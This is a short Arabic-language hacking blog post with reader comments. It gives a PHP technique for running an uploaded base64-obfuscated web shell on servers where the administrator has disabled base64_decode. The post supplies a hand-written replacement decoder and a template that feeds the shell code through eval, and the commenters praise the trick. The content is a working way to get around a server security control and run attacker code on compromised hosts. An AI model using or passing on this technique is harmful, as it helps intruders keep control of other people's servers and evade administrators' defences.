Share

bYpAss eVal error while Executing a Based64 Code :)

السلام عليكم


كتير من الاوقات ترفع شل مشفر بواسطة


base64


تلاقيه جايبلك ايرور وميرضاش يشتغل


لان مدير السيرفر ضايف دالة


base64_decode


فى الدوال الممنوعه


الحل بسيط جدا






فى الشل اللى معاك بعد العلامه


<?


حط الكود ده

function fadecode($str)
{
$line = strlen($str);
$ret = '';
$b64 = array();
$base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
$b64_line = strlen($base64);


for ($i = 0; $i < 256; $i++)
$b64[$i] = 0;
for ($i = 0; $i < $b64_line ; $i++)
$b64[ord($base64[$i])] = $i;


for($j=0;$j<$line;$j+=4)
{
for ($i = 0; $i < 4; $i++)
{
$c = ord($str[$j+$i]);
$a[$i] = $c;
$b[$i] = $b64[$c];
}


$o[0] = ($b[0] << 2) | ($b[1] >> 4);
$o[1] = ($b[1] << 4) | ($b[2] >> 2);
$o[2] = ($b[2] << 6) | $b[3];
if ($a[2] == ord('='))
$i = 1;
else if ($a[3] == ord('='))
$i = 2;
else
$i = 3;


for($k=0;$k<$i;$k++)
$ret .= chr((int) $o[$k] & 255);


if ($i < 3)
break;
}


return $ret;


}


بعدين استبدل


base64_decode


ب


fadecode


بحيث يبقى الشل بالشكل ده تقريبا


<?


//1337r1z.wordpress.com
//setting the Decoding function

function fadecode($str)
{
$line = strlen($str);
$ret = '';
$b64 = array();
$base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
$b64_line = strlen($base64);

for ($i = 0; $i < 256; $i++)
$b64[$i] = 0;
for ($i = 0; $i < $b64_line ; $i++)
$b64[ord($base64[$i])] = $i;

for($j=0;$j<$line;$j+=4)
{
for ($i = 0; $i < 4; $i++)
{
$c = ord($str[$j+$i]);
$a[$i] = $c;
$b[$i] = $b64[$c];
}

$o[0] = ($b[0] << 2) | ($b[1] >> 4);
$o[1] = ($b[1] << 4) | ($b[2] >> 2);
$o[2] = ($b[2] << 6) | $b[3];
if ($a[2] == ord('='))
$i = 1;
else if ($a[3] == ord('='))
$i = 2;
else
$i = 3;

for($k=0;$k<$i;$k++)
$ret .= chr((int) $o[$k] & 255);

if ($i < 3)
break;
}

return $ret;


}


// now we will start using our function
eval(fadecode('Your base64 shell code here'));
//Done :)
?>


ارفع الشل واتصفح
تلقاه شغال فله
بالتوفيق


./faris

4 comments:

X-SHADOW said...

السلام عليكم ورحمة الله وبركاته

ما شاء الله ,

وحش يا حج فارس ..

اخوك

X-SHADOW ..

Moh4mm3d said...

Great men keep it up

Zaid said...

احاا
شو الجديد يعني ؟؟ =))
قصدي شو المش جديد ابو فارس ؟؟ :))
ابداع فارساوي استمر كده ههههه :p

Security-MInd said...

اصلي يا ولد

Post a Comment